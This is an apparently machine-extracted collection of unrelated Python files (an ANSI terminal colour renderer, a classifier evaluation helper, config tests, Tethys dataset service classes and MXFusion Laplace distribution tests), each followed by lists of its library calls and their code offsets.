return sty.fg(self.palette.match(color, ansi=True).ansi)
@property
def rs(self):
return sty.rs
@property
def ef(self):
return sty.ef
class AnsiNoColorRenderer(Ansi256Renderer):
def render(self, text, fg: Color, bg: OptionalColor = None, ansi_reset=False):
return text
class Ansi16Renderer(Ansi256Renderer):
def __init__(self,
palette: OptionalPalette = None,
fallback: OptionalPalette = None) -> None:
super().__init__(palette=Ansi16Palette,
fallback=fallback)
def render(self, text, fg: Color, bg: OptionalColor = None, ansi_reset=False):
# todo: downsample 256 to 16 colors
        return super().render(text, fg=fg, bg=bg, ansi_reset=ansi_reset)
class Ansi8Renderer(Ansi256Renderer):
def __init__(self,
palette: OptionalPalette = None,
fallback: OptionalPalette = None) -> None:
super().__init__(palette=Ansi8Palette,
fallback=fallback)
def render(self, text, fg: Color, bg: OptionalColor = None, ansi_reset=False):
# todo: downsample 256 to 8 colors
        return super().render(text, fg=fg, bg=bg, ansi_reset=ansi_reset)
class AnsiTruecolorRenderer(BaseRenderer):
def match(self, color: Color) -> ColorPoint:
ansi = rgb_to_RGB255(color.rgb)
return ColorPoint(color, color, ansi=ansi)
def render(self, text, fg: Color, bg: OptionalColor = None, ansi_reset=False):
if ansi_reset:
return text
fg = self.palette.match(fg)
if bg:
bg = self.palette.match(bg)
return self._render(text, fg=fg, bg=bg)
def _render(self, text, fg: ColorPoint, bg: ColorPoint = None):
rgb = rgb_to_RGB255(fg.target.rgb)
out = ''
out += sty.fg(*rgb)
if bg:
bgrgb = rgb_to_RGB255(bg.target.rgb)
out += sty.bg(*bgrgb)
out += text
out += sty.rs.all
return out
def bg(self, color: Color) -> str:
bg = self.palette.match(color)
rgb = rgb_to_RGB255(bg.target.rgb)
        return sty.bg(*rgb)
def fg(self, color: Color) -> str:
fg = self.palette.match(color)
rgb = rgb_to_RGB255(fg.target.rgb)
return sty.fg(*rgb)
@property
def rs(self):
return sty.rs
@property
def ef(self):
return sty.ef
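# Map terminal type names and color-depth hints to an appropriate renderer class.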
render_map = {
'-1': AnsiTruecolorRenderer,
'0': AnsiNoColorRenderer,
'8': Ansi8Renderer,
'16': Ansi16Renderer,
'88': Ansi256Renderer,
'256': Ansi256Renderer,
'ansi': Ansi256Renderer,
'rgb': AnsiTruecolorRenderer,
'truecolor': AnsiTruecolorRenderer,
'24bit': AnsiTruecolorRenderer,
'vt100': AnsiNoColorRenderer,
'vt200': AnsiNoColorRenderer,
'vt220': AnsiNoColorRenderer,
'rxvt': Ansi16Renderer,
'rxvt-88color': Ansi256Renderer,
'xterm': Ansi16Renderer,
'xterm-color': Ansi16Renderer,
'xterm-256color': Ansi256Renderer,
}
|
[
"autopalette.colormatch.ColorPoint",
"sty.fg",
"autopalette.utils.rgb_to_RGB255",
"sty.bg",
"autopalette.palette.Ansi256Palette"
] |
[((1771, 1786), 'sty.fg', 'sty.fg', (['fg.ansi'], {}), '(fg.ansi)\n', (1777, 1786), False, 'import sty\n'), ((3653, 3677), 'autopalette.utils.rgb_to_RGB255', 'rgb_to_RGB255', (['color.rgb'], {}), '(color.rgb)\n', (3666, 3677), False, 'from autopalette.utils import rgb_to_RGB255\n'), ((3693, 3728), 'autopalette.colormatch.ColorPoint', 'ColorPoint', (['color', 'color'], {'ansi': 'ansi'}), '(color, color, ansi=ansi)\n', (3703, 3728), False, 'from autopalette.colormatch import ColorPoint, AnsiCodeType\n'), ((4082, 4110), 'autopalette.utils.rgb_to_RGB255', 'rgb_to_RGB255', (['fg.target.rgb'], {}), '(fg.target.rgb)\n', (4095, 4110), False, 'from autopalette.utils import rgb_to_RGB255\n'), ((4143, 4155), 'sty.fg', 'sty.fg', (['*rgb'], {}), '(*rgb)\n', (4149, 4155), False, 'import sty\n'), ((4412, 4440), 'autopalette.utils.rgb_to_RGB255', 'rgb_to_RGB255', (['bg.target.rgb'], {}), '(bg.target.rgb)\n', (4425, 4440), False, 'from autopalette.utils import rgb_to_RGB255\n'), ((4456, 4468), 'sty.fg', 'sty.fg', (['*rgb'], {}), '(*rgb)\n', (4462, 4468), False, 'import sty\n'), ((4562, 4590), 'autopalette.utils.rgb_to_RGB255', 'rgb_to_RGB255', (['fg.target.rgb'], {}), '(fg.target.rgb)\n', (4575, 4590), False, 'from autopalette.utils import rgb_to_RGB255\n'), ((4606, 4618), 'sty.fg', 'sty.fg', (['*rgb'], {}), '(*rgb)\n', (4612, 4618), False, 'import sty\n'), ((583, 599), 'autopalette.palette.Ansi256Palette', 'Ansi256Palette', ([], {}), '()\n', (597, 599), False, 'from autopalette.palette import Ansi256Palette, Ansi16Palette, Ansi8Palette\n'), ((650, 666), 'autopalette.palette.Ansi256Palette', 'Ansi256Palette', ([], {}), '()\n', (664, 666), False, 'from autopalette.palette import Ansi256Palette, Ansi16Palette, Ansi8Palette\n'), ((1821, 1836), 'sty.bg', 'sty.bg', (['bg.ansi'], {}), '(bg.ansi)\n', (1827, 1836), False, 'import sty\n'), ((4191, 4219), 'autopalette.utils.rgb_to_RGB255', 'rgb_to_RGB255', (['bg.target.rgb'], {}), '(bg.target.rgb)\n', (4204, 4219), False, 'from autopalette.utils import rgb_to_RGB255\n'), ((4239, 4253), 'sty.bg', 'sty.bg', (['*bgrgb'], {}), '(*bgrgb)\n', (4245, 4253), False, 'import sty\n')]
|
import logging
from src.evaluation.stats import stats_evaluation
console = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
console.setFormatter(formatter)
LOG = logging.getLogger("Random Dataset Validator")
LOG.addHandler(console)
LOG.setLevel(logging.INFO)
def random_dataset_split_eval(classifier, peptides_test, classification_test, test_size_percent):
"""
    Runs a statistical evaluation of the predictions against the known results, and can
    optionally start the AUC, tree and feature-importance plots (currently commented out).
    :param classifier: trained classifier used to predict the test set
    :param peptides_test: feature data of the test set
    :param classification_test: known classifications of the test set
    :param test_size_percent: size of the test dataset as a fraction (percent/100)
    :return:
"""
LOG.info("Evaluating a random subset of size: " + str(test_size_percent) + " of the training data")
classification_pred = classifier.predict(peptides_test)
LOG.info("Successfully evaluated a random subset of the training data")
# plot_auc_curve(classifier)
# plot_learning_tree(classifier)
# plot_feature_importance(classifier)
stats_evaluation(classification_test, classification_pred)
|
[
"logging.Formatter",
"src.evaluation.stats.stats_evaluation",
"logging.StreamHandler",
"logging.getLogger"
] |
[((77, 100), 'logging.StreamHandler', 'logging.StreamHandler', ([], {}), '()\n', (98, 100), False, 'import logging\n'), ((113, 186), 'logging.Formatter', 'logging.Formatter', (['"""%(asctime)s - %(name)s - %(levelname)s - %(message)s"""'], {}), "('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n", (130, 186), False, 'import logging\n'), ((225, 270), 'logging.getLogger', 'logging.getLogger', (['"""Random Dataset Validator"""'], {}), "('Random Dataset Validator')\n", (242, 270), False, 'import logging\n'), ((1087, 1145), 'src.evaluation.stats.stats_evaluation', 'stats_evaluation', (['classification_test', 'classification_pred'], {}), '(classification_test, classification_pred)\n', (1103, 1145), False, 'from src.evaluation.stats import stats_evaluation\n')]
|
#!/usr/bin/env false
"""TODO: Write
"""
# Internal packages (absolute references, distributed with Python)
# External packages (absolute references, NOT distributed with Python)
# Library modules (absolute references, NOT packaged, in project)
from utility import my_assert as is_
# Project modules (relative references, NOT packaged, in project)
def test_application_name(config):
v = config.application_name
assert is_.nonempty_string(v)
def test_log_directory(config):
v = config.log_directory
assert is_.absolute_path(v)
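    # The log directory may not exist yet; only check that it is a directory when it does.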
if v.exists():
assert is_.absolute_directory(v)
def test_log_file(config):
v = config.log_file
assert is_.absolute_path(v)
def test_log_name(config):
v = config.log_name
assert is_.nonempty_string(v)
def test_log_suffix(config):
v = config.log_suffix
assert is_.nonempty_string(v)
def test_pid_file(config):
v = config.pid_file
assert is_.absolute_path(v)
def test_pid_suffix(config):
v = config.pid_suffix
assert is_.nonempty_string(v)
def test_project_directory(config):
v = config.project_directory
assert is_.absolute_directory(v)
def test_temporary_directory(config):
v = config.temporary_directory
assert is_.absolute_directory(v)
"""DisabledContent
"""
|
[
"utility.my_assert.nonempty_string",
"utility.my_assert.absolute_path",
"utility.my_assert.absolute_directory"
] |
[((432, 454), 'utility.my_assert.nonempty_string', 'is_.nonempty_string', (['v'], {}), '(v)\n', (451, 454), True, 'from utility import my_assert as is_\n'), ((529, 549), 'utility.my_assert.absolute_path', 'is_.absolute_path', (['v'], {}), '(v)\n', (546, 549), True, 'from utility import my_assert as is_\n'), ((674, 694), 'utility.my_assert.absolute_path', 'is_.absolute_path', (['v'], {}), '(v)\n', (691, 694), True, 'from utility import my_assert as is_\n'), ((759, 781), 'utility.my_assert.nonempty_string', 'is_.nonempty_string', (['v'], {}), '(v)\n', (778, 781), True, 'from utility import my_assert as is_\n'), ((850, 872), 'utility.my_assert.nonempty_string', 'is_.nonempty_string', (['v'], {}), '(v)\n', (869, 872), True, 'from utility import my_assert as is_\n'), ((937, 957), 'utility.my_assert.absolute_path', 'is_.absolute_path', (['v'], {}), '(v)\n', (954, 957), True, 'from utility import my_assert as is_\n'), ((1026, 1048), 'utility.my_assert.nonempty_string', 'is_.nonempty_string', (['v'], {}), '(v)\n', (1045, 1048), True, 'from utility import my_assert as is_\n'), ((1131, 1156), 'utility.my_assert.absolute_directory', 'is_.absolute_directory', (['v'], {}), '(v)\n', (1153, 1156), True, 'from utility import my_assert as is_\n'), ((1243, 1268), 'utility.my_assert.absolute_directory', 'is_.absolute_directory', (['v'], {}), '(v)\n', (1265, 1268), True, 'from utility import my_assert as is_\n'), ((584, 609), 'utility.my_assert.absolute_directory', 'is_.absolute_directory', (['v'], {}), '(v)\n', (606, 609), True, 'from utility import my_assert as is_\n')]
|
from tethys_dataset_services.valid_engines import VALID_ENGINES, VALID_SPATIAL_ENGINES
class DatasetService:
"""
Used to define dataset services for apps.
"""
def __init__(self, name, type, endpoint, apikey=None, username=None, password=None):
"""
Constructor
"""
self.name = name
# Validate the types
if type in VALID_ENGINES:
self.type = type
self.engine = VALID_ENGINES[type]
else:
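            # Build a human-readable, comma-separated list of the valid engine types for the error message.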
if len(VALID_ENGINES) > 2:
comma_separated_types = ', '.join('"{0}"'.format(t) for t in VALID_ENGINES.keys()[:-1])
last_type = '"{0}"'.format(VALID_ENGINES.keys()[-1])
valid_types_string = '{0}, and {1}'.format(comma_separated_types, last_type)
elif len(VALID_ENGINES) == 2:
valid_types_string = '"{0}" and "{1}"'.format(VALID_ENGINES.keys()[0], VALID_ENGINES.keys()[1])
else:
valid_types_string = '"{0}"'.format(VALID_ENGINES.keys()[0])
raise ValueError('The value "{0}" is not a valid for argument "type" of DatasetService. Valid values for '
'"type" argument include {1}.'.format(type, valid_types_string))
self.endpoint = endpoint
self.apikey = apikey
self.username = username
self.password = password
def __repr__(self):
"""
String representation
"""
return '<DatasetService: type={0}, api_endpoint={1}>'.format(self.type, self.endpoint)
class SpatialDatasetService:
"""
Used to define spatial dataset services for apps.
"""
def __init__(self, name, type, endpoint, apikey=None, username=None, password=None):
"""
Constructor
"""
self.name = name
# Validate the types
if type in VALID_SPATIAL_ENGINES:
self.type = type
self.engine = VALID_SPATIAL_ENGINES[type]
else:
if len(VALID_SPATIAL_ENGINES) > 2:
comma_separated_types = ', '.join('"{0}"'.format(t) for t in VALID_SPATIAL_ENGINES.keys()[:-1])
last_type = '"{0}"'.format(VALID_SPATIAL_ENGINES.keys()[-1])
valid_types_string = '{0}, and {1}'.format(comma_separated_types, last_type)
elif len(VALID_SPATIAL_ENGINES) == 2:
valid_types_string = '"{0}" and "{1}"'.format(VALID_SPATIAL_ENGINES.keys()[0], VALID_SPATIAL_ENGINES.keys()[1])
else:
valid_types_string = '"{0}"'.format(VALID_SPATIAL_ENGINES.keys()[0])
raise ValueError('The value "{0}" is not a valid for argument "type" of SpatialDatasetService. Valid values for '
'"type" argument include {1}.'.format(type, valid_types_string))
self.endpoint = endpoint
self.apikey = apikey
self.username = username
self.password = password
def __repr__(self):
"""
String representation
"""
return '<SpatialDatasetService: type={0}, api_endpoint={1}>'.format(self.type, self.endpoint)
|
[
"tethys_dataset_services.valid_engines.VALID_SPATIAL_ENGINES.keys",
"tethys_dataset_services.valid_engines.VALID_ENGINES.keys"
] |
[((671, 691), 'tethys_dataset_services.valid_engines.VALID_ENGINES.keys', 'VALID_ENGINES.keys', ([], {}), '()\n', (689, 691), False, 'from tethys_dataset_services.valid_engines import VALID_ENGINES, VALID_SPATIAL_ENGINES\n'), ((2187, 2215), 'tethys_dataset_services.valid_engines.VALID_SPATIAL_ENGINES.keys', 'VALID_SPATIAL_ENGINES.keys', ([], {}), '()\n', (2213, 2215), False, 'from tethys_dataset_services.valid_engines import VALID_ENGINES, VALID_SPATIAL_ENGINES\n'), ((894, 914), 'tethys_dataset_services.valid_engines.VALID_ENGINES.keys', 'VALID_ENGINES.keys', ([], {}), '()\n', (912, 914), False, 'from tethys_dataset_services.valid_engines import VALID_ENGINES, VALID_SPATIAL_ENGINES\n'), ((919, 939), 'tethys_dataset_services.valid_engines.VALID_ENGINES.keys', 'VALID_ENGINES.keys', ([], {}), '()\n', (937, 939), False, 'from tethys_dataset_services.valid_engines import VALID_ENGINES, VALID_SPATIAL_ENGINES\n'), ((1014, 1034), 'tethys_dataset_services.valid_engines.VALID_ENGINES.keys', 'VALID_ENGINES.keys', ([], {}), '()\n', (1032, 1034), False, 'from tethys_dataset_services.valid_engines import VALID_ENGINES, VALID_SPATIAL_ENGINES\n'), ((2426, 2454), 'tethys_dataset_services.valid_engines.VALID_SPATIAL_ENGINES.keys', 'VALID_SPATIAL_ENGINES.keys', ([], {}), '()\n', (2452, 2454), False, 'from tethys_dataset_services.valid_engines import VALID_ENGINES, VALID_SPATIAL_ENGINES\n'), ((2459, 2487), 'tethys_dataset_services.valid_engines.VALID_SPATIAL_ENGINES.keys', 'VALID_SPATIAL_ENGINES.keys', ([], {}), '()\n', (2485, 2487), False, 'from tethys_dataset_services.valid_engines import VALID_ENGINES, VALID_SPATIAL_ENGINES\n'), ((2562, 2590), 'tethys_dataset_services.valid_engines.VALID_SPATIAL_ENGINES.keys', 'VALID_SPATIAL_ENGINES.keys', ([], {}), '()\n', (2588, 2590), False, 'from tethys_dataset_services.valid_engines import VALID_ENGINES, VALID_SPATIAL_ENGINES\n'), ((601, 621), 'tethys_dataset_services.valid_engines.VALID_ENGINES.keys', 'VALID_ENGINES.keys', ([], {}), '()\n', (619, 621), False, 'from tethys_dataset_services.valid_engines import VALID_ENGINES, VALID_SPATIAL_ENGINES\n'), ((2109, 2137), 'tethys_dataset_services.valid_engines.VALID_SPATIAL_ENGINES.keys', 'VALID_SPATIAL_ENGINES.keys', ([], {}), '()\n', (2135, 2137), False, 'from tethys_dataset_services.valid_engines import VALID_ENGINES, VALID_SPATIAL_ENGINES\n')]
|
import pytest
import mxnet as mx
import numpy as np
from mxfusion.components.variables.runtime_variable import add_sample_dimension, array_has_samples, get_num_samples
from mxfusion.components.distributions import Laplace
from mxfusion.util.testutils import numpy_array_reshape, plot_univariate
from mxfusion.util.testutils import MockMXNetRandomGenerator
from scipy.stats import laplace
@pytest.mark.usefixtures("set_seed")
class TestLaplaceDistribution(object):
@pytest.mark.parametrize(
"dtype, location, location_is_samples, scale, scale_is_samples, rv, rv_is_samples, num_samples", [
(np.float64, np.random.rand(5,3,2), True, np.random.rand(3,2)+0.1, False, np.random.rand(5,3,2), True, 5),
(np.float64, np.random.rand(3,2), False, np.random.rand(5,3,2)+0.1, True, np.random.rand(5,3,2), True, 5),
(np.float64, np.random.rand(3,2), False, np.random.rand(3,2)+0.1, False, np.random.rand(5,3,2), True, 5),
(np.float64, np.random.rand(3,2), False, np.random.rand(3,2)+0.1, False, np.random.rand(3,2), False, 1),
(np.float32, np.random.rand(5,3,2), True, np.random.rand(3,2)+0.1, False, np.random.rand(5,3,2), True, 5),
])
def test_log_pdf(self, dtype, location, location_is_samples, scale, scale_is_samples, rv, rv_is_samples,
num_samples):
is_samples_any = any([location_is_samples, scale_is_samples, rv_is_samples])
rv_shape = rv.shape[1:] if rv_is_samples else rv.shape
n_dim = 1 + len(rv.shape) if is_samples_any and not rv_is_samples else len(rv.shape)
location_np = numpy_array_reshape(location, location_is_samples, n_dim)
scale_np = numpy_array_reshape(scale, scale_is_samples, n_dim)
rv_np = numpy_array_reshape(rv, rv_is_samples, n_dim)
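        # Reference log-pdf computed with scipy, used to validate the MXFusion result below.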
log_pdf_np = laplace.logpdf(rv_np, location_np, scale_np)
var = Laplace.define_variable(shape=rv_shape, dtype=dtype).factor
location_mx = mx.nd.array(location, dtype=dtype)
if not location_is_samples:
location_mx = add_sample_dimension(mx.nd, location_mx)
var_mx = mx.nd.array(scale, dtype=dtype)
if not scale_is_samples:
var_mx = add_sample_dimension(mx.nd, var_mx)
rv_mx = mx.nd.array(rv, dtype=dtype)
if not rv_is_samples:
rv_mx = add_sample_dimension(mx.nd, rv_mx)
variables = {var.location.uuid: location_mx, var.scale.uuid: var_mx, var.random_variable.uuid: rv_mx}
log_pdf_rt = var.log_pdf(F=mx.nd, variables=variables)
assert np.issubdtype(log_pdf_rt.dtype, dtype)
assert array_has_samples(mx.nd, log_pdf_rt) == is_samples_any
if is_samples_any:
assert get_num_samples(mx.nd, log_pdf_rt) == num_samples
if np.issubdtype(dtype, np.float64):
rtol, atol = 1e-7, 1e-10
else:
rtol, atol = 1e-4, 1e-5
assert np.allclose(log_pdf_np, log_pdf_rt.asnumpy(), rtol=rtol, atol=atol)
@pytest.mark.parametrize(
"dtype, location, location_is_samples, scale, scale_is_samples, rv_shape, num_samples", [
(np.float64, np.random.rand(5,3,2), True, np.random.rand(3,2)+0.1, False, (3,2), 5),
(np.float64, np.random.rand(3,2), False, np.random.rand(5,3,2)+0.1, True, (3,2), 5),
(np.float64, np.random.rand(3,2), False, np.random.rand(3,2)+0.1, False, (3,2), 5),
(np.float64, np.random.rand(5,3,2), True, np.random.rand(5,3,2)+0.1, True, (3,2), 5),
(np.float32, np.random.rand(5,3,2), True, np.random.rand(3,2)+0.1, False, (3,2), 5),
])
def test_draw_samples(self, dtype, location, location_is_samples, scale,
scale_is_samples, rv_shape, num_samples):
n_dim = 1 + len(rv_shape)
location_np = numpy_array_reshape(location, location_is_samples, n_dim)
scale_np = numpy_array_reshape(scale, scale_is_samples, n_dim)
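        # Location-scale sampling: X = location + scale * Laplace(0, 1).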
rand = np.random.laplace(size=(num_samples,) + rv_shape)
rv_samples_np = location_np + rand * scale_np
rand_gen = MockMXNetRandomGenerator(mx.nd.array(rand.flatten(), dtype=dtype))
var = Laplace.define_variable(shape=rv_shape, dtype=dtype, rand_gen=rand_gen).factor
location_mx = mx.nd.array(location, dtype=dtype)
if not location_is_samples:
location_mx = add_sample_dimension(mx.nd, location_mx)
scale_mx = mx.nd.array(scale, dtype=dtype)
if not scale_is_samples:
scale_mx = add_sample_dimension(mx.nd, scale_mx)
variables = {var.location.uuid: location_mx, var.scale.uuid: scale_mx}
rv_samples_rt = var.draw_samples(F=mx.nd, variables=variables, num_samples=num_samples)
assert np.issubdtype(rv_samples_rt.dtype, dtype)
assert array_has_samples(mx.nd, rv_samples_rt)
assert get_num_samples(mx.nd, rv_samples_rt) == num_samples
if np.issubdtype(dtype, np.float64):
rtol, atol = 1e-7, 1e-10
else:
rtol, atol = 1e-4, 1e-5
assert np.allclose(rv_samples_np, rv_samples_rt.asnumpy(), rtol=rtol, atol=atol)
def test_draw_samples_non_mock(self, plot=False):
# Also make sure the non-mock sampler works
dtype = np.float32
num_samples = 100000
location = np.array([0.5])
scale = np.array([2])
rv_shape = (1,)
location_mx = add_sample_dimension(mx.nd, mx.nd.array(location, dtype=dtype))
scale_mx = add_sample_dimension(mx.nd, mx.nd.array(scale, dtype=dtype))
rand_gen = None
var = Laplace.define_variable(shape=rv_shape, rand_gen=rand_gen, dtype=dtype).factor
variables = {var.location.uuid: location_mx, var.scale.uuid: scale_mx}
rv_samples_rt = var.draw_samples(F=mx.nd, variables=variables, num_samples=num_samples)
assert array_has_samples(mx.nd, rv_samples_rt)
assert get_num_samples(mx.nd, rv_samples_rt) == num_samples
assert rv_samples_rt.dtype == dtype
if plot:
plot_univariate(samples=rv_samples_rt, dist=laplace, loc=location[0], scale=scale[0])
location_est, scale_est = laplace.fit(rv_samples_rt.asnumpy().ravel())
location_tol = 1e-2
scale_tol = 1e-2
assert np.abs(location[0] - location_est) < location_tol
assert np.abs(scale[0] - scale_est) < scale_tol
|
[
"numpy.abs",
"mxfusion.util.testutils.plot_univariate",
"numpy.random.laplace",
"mxfusion.components.variables.runtime_variable.array_has_samples",
"numpy.random.rand",
"mxfusion.components.distributions.Laplace.define_variable",
"scipy.stats.laplace.logpdf",
"numpy.array",
"mxnet.nd.array",
"mxfusion.components.variables.runtime_variable.add_sample_dimension",
"mxfusion.util.testutils.numpy_array_reshape",
"pytest.mark.usefixtures",
"mxfusion.components.variables.runtime_variable.get_num_samples",
"numpy.issubdtype"
] |
[((391, 426), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""set_seed"""'], {}), "('set_seed')\n", (414, 426), False, 'import pytest\n'), ((1594, 1651), 'mxfusion.util.testutils.numpy_array_reshape', 'numpy_array_reshape', (['location', 'location_is_samples', 'n_dim'], {}), '(location, location_is_samples, n_dim)\n', (1613, 1651), False, 'from mxfusion.util.testutils import numpy_array_reshape, plot_univariate\n'), ((1671, 1722), 'mxfusion.util.testutils.numpy_array_reshape', 'numpy_array_reshape', (['scale', 'scale_is_samples', 'n_dim'], {}), '(scale, scale_is_samples, n_dim)\n', (1690, 1722), False, 'from mxfusion.util.testutils import numpy_array_reshape, plot_univariate\n'), ((1739, 1784), 'mxfusion.util.testutils.numpy_array_reshape', 'numpy_array_reshape', (['rv', 'rv_is_samples', 'n_dim'], {}), '(rv, rv_is_samples, n_dim)\n', (1758, 1784), False, 'from mxfusion.util.testutils import numpy_array_reshape, plot_univariate\n'), ((1807, 1851), 'scipy.stats.laplace.logpdf', 'laplace.logpdf', (['rv_np', 'location_np', 'scale_np'], {}), '(rv_np, location_np, scale_np)\n', (1821, 1851), False, 'from scipy.stats import laplace\n'), ((1949, 1983), 'mxnet.nd.array', 'mx.nd.array', (['location'], {'dtype': 'dtype'}), '(location, dtype=dtype)\n', (1960, 1983), True, 'import mxnet as mx\n'), ((2104, 2135), 'mxnet.nd.array', 'mx.nd.array', (['scale'], {'dtype': 'dtype'}), '(scale, dtype=dtype)\n', (2115, 2135), True, 'import mxnet as mx\n'), ((2242, 2270), 'mxnet.nd.array', 'mx.nd.array', (['rv'], {'dtype': 'dtype'}), '(rv, dtype=dtype)\n', (2253, 2270), True, 'import mxnet as mx\n'), ((2545, 2583), 'numpy.issubdtype', 'np.issubdtype', (['log_pdf_rt.dtype', 'dtype'], {}), '(log_pdf_rt.dtype, dtype)\n', (2558, 2583), True, 'import numpy as np\n'), ((2761, 2793), 'numpy.issubdtype', 'np.issubdtype', (['dtype', 'np.float64'], {}), '(dtype, np.float64)\n', (2774, 2793), True, 'import numpy as np\n'), ((3771, 3828), 'mxfusion.util.testutils.numpy_array_reshape', 'numpy_array_reshape', (['location', 'location_is_samples', 'n_dim'], {}), '(location, location_is_samples, n_dim)\n', (3790, 3828), False, 'from mxfusion.util.testutils import numpy_array_reshape, plot_univariate\n'), ((3848, 3899), 'mxfusion.util.testutils.numpy_array_reshape', 'numpy_array_reshape', (['scale', 'scale_is_samples', 'n_dim'], {}), '(scale, scale_is_samples, n_dim)\n', (3867, 3899), False, 'from mxfusion.util.testutils import numpy_array_reshape, plot_univariate\n'), ((3916, 3965), 'numpy.random.laplace', 'np.random.laplace', ([], {'size': '((num_samples,) + rv_shape)'}), '(size=(num_samples,) + rv_shape)\n', (3933, 3965), True, 'import numpy as np\n'), ((4223, 4257), 'mxnet.nd.array', 'mx.nd.array', (['location'], {'dtype': 'dtype'}), '(location, dtype=dtype)\n', (4234, 4257), True, 'import mxnet as mx\n'), ((4380, 4411), 'mxnet.nd.array', 'mx.nd.array', (['scale'], {'dtype': 'dtype'}), '(scale, dtype=dtype)\n', (4391, 4411), True, 'import mxnet as mx\n'), ((4698, 4739), 'numpy.issubdtype', 'np.issubdtype', (['rv_samples_rt.dtype', 'dtype'], {}), '(rv_samples_rt.dtype, dtype)\n', (4711, 4739), True, 'import numpy as np\n'), ((4755, 4794), 'mxfusion.components.variables.runtime_variable.array_has_samples', 'array_has_samples', (['mx.nd', 'rv_samples_rt'], {}), '(mx.nd, rv_samples_rt)\n', (4772, 4794), False, 'from mxfusion.components.variables.runtime_variable import add_sample_dimension, array_has_samples, get_num_samples\n'), ((4875, 4907), 'numpy.issubdtype', 'np.issubdtype', (['dtype', 'np.float64'], {}), '(dtype, np.float64)\n', (4888, 4907), True, 'import numpy as np\n'), ((5268, 5283), 'numpy.array', 'np.array', (['[0.5]'], {}), '([0.5])\n', (5276, 5283), True, 'import numpy as np\n'), ((5300, 5313), 'numpy.array', 'np.array', (['[2]'], {}), '([2])\n', (5308, 5313), True, 'import numpy as np\n'), ((5815, 5854), 'mxfusion.components.variables.runtime_variable.array_has_samples', 'array_has_samples', (['mx.nd', 'rv_samples_rt'], {}), '(mx.nd, rv_samples_rt)\n', (5832, 5854), False, 'from mxfusion.components.variables.runtime_variable import add_sample_dimension, array_has_samples, get_num_samples\n'), ((1866, 1918), 'mxfusion.components.distributions.Laplace.define_variable', 'Laplace.define_variable', ([], {'shape': 'rv_shape', 'dtype': 'dtype'}), '(shape=rv_shape, dtype=dtype)\n', (1889, 1918), False, 'from mxfusion.components.distributions import Laplace\n'), ((2046, 2086), 'mxfusion.components.variables.runtime_variable.add_sample_dimension', 'add_sample_dimension', (['mx.nd', 'location_mx'], {}), '(mx.nd, location_mx)\n', (2066, 2086), False, 'from mxfusion.components.variables.runtime_variable import add_sample_dimension, array_has_samples, get_num_samples\n'), ((2190, 2225), 'mxfusion.components.variables.runtime_variable.add_sample_dimension', 'add_sample_dimension', (['mx.nd', 'var_mx'], {}), '(mx.nd, var_mx)\n', (2210, 2225), False, 'from mxfusion.components.variables.runtime_variable import add_sample_dimension, array_has_samples, get_num_samples\n'), ((2321, 2355), 'mxfusion.components.variables.runtime_variable.add_sample_dimension', 'add_sample_dimension', (['mx.nd', 'rv_mx'], {}), '(mx.nd, rv_mx)\n', (2341, 2355), False, 'from mxfusion.components.variables.runtime_variable import add_sample_dimension, array_has_samples, get_num_samples\n'), ((2599, 2635), 'mxfusion.components.variables.runtime_variable.array_has_samples', 'array_has_samples', (['mx.nd', 'log_pdf_rt'], {}), '(mx.nd, log_pdf_rt)\n', (2616, 2635), False, 'from mxfusion.components.variables.runtime_variable import add_sample_dimension, array_has_samples, get_num_samples\n'), ((4122, 4193), 'mxfusion.components.distributions.Laplace.define_variable', 'Laplace.define_variable', ([], {'shape': 'rv_shape', 'dtype': 'dtype', 'rand_gen': 'rand_gen'}), '(shape=rv_shape, dtype=dtype, rand_gen=rand_gen)\n', (4145, 4193), False, 'from mxfusion.components.distributions import Laplace\n'), ((4320, 4360), 'mxfusion.components.variables.runtime_variable.add_sample_dimension', 'add_sample_dimension', (['mx.nd', 'location_mx'], {}), '(mx.nd, location_mx)\n', (4340, 4360), False, 'from mxfusion.components.variables.runtime_variable import add_sample_dimension, array_has_samples, get_num_samples\n'), ((4468, 4505), 'mxfusion.components.variables.runtime_variable.add_sample_dimension', 'add_sample_dimension', (['mx.nd', 'scale_mx'], {}), '(mx.nd, scale_mx)\n', (4488, 4505), False, 'from mxfusion.components.variables.runtime_variable import add_sample_dimension, array_has_samples, get_num_samples\n'), ((4810, 4847), 'mxfusion.components.variables.runtime_variable.get_num_samples', 'get_num_samples', (['mx.nd', 'rv_samples_rt'], {}), '(mx.nd, rv_samples_rt)\n', (4825, 4847), False, 'from mxfusion.components.variables.runtime_variable import add_sample_dimension, array_has_samples, get_num_samples\n'), ((5390, 5424), 'mxnet.nd.array', 'mx.nd.array', (['location'], {'dtype': 'dtype'}), '(location, dtype=dtype)\n', (5401, 5424), True, 'import mxnet as mx\n'), ((5473, 5504), 'mxnet.nd.array', 'mx.nd.array', (['scale'], {'dtype': 'dtype'}), '(scale, dtype=dtype)\n', (5484, 5504), True, 'import mxnet as mx\n'), ((5545, 5616), 'mxfusion.components.distributions.Laplace.define_variable', 'Laplace.define_variable', ([], {'shape': 'rv_shape', 'rand_gen': 'rand_gen', 'dtype': 'dtype'}), '(shape=rv_shape, rand_gen=rand_gen, dtype=dtype)\n', (5568, 5616), False, 'from mxfusion.components.distributions import Laplace\n'), ((5870, 5907), 'mxfusion.components.variables.runtime_variable.get_num_samples', 'get_num_samples', (['mx.nd', 'rv_samples_rt'], {}), '(mx.nd, rv_samples_rt)\n', (5885, 5907), False, 'from mxfusion.components.variables.runtime_variable import add_sample_dimension, array_has_samples, get_num_samples\n'), ((5997, 6087), 'mxfusion.util.testutils.plot_univariate', 'plot_univariate', ([], {'samples': 'rv_samples_rt', 'dist': 'laplace', 'loc': 'location[0]', 'scale': 'scale[0]'}), '(samples=rv_samples_rt, dist=laplace, loc=location[0], scale\n =scale[0])\n', (6012, 6087), False, 'from mxfusion.util.testutils import numpy_array_reshape, plot_univariate\n'), ((6231, 6265), 'numpy.abs', 'np.abs', (['(location[0] - location_est)'], {}), '(location[0] - location_est)\n', (6237, 6265), True, 'import numpy as np\n'), ((6296, 6324), 'numpy.abs', 'np.abs', (['(scale[0] - scale_est)'], {}), '(scale[0] - scale_est)\n', (6302, 6324), True, 'import numpy as np\n'), ((2700, 2734), 'mxfusion.components.variables.runtime_variable.get_num_samples', 'get_num_samples', (['mx.nd', 'log_pdf_rt'], {}), '(mx.nd, log_pdf_rt)\n', (2715, 2734), False, 'from mxfusion.components.variables.runtime_variable import add_sample_dimension, 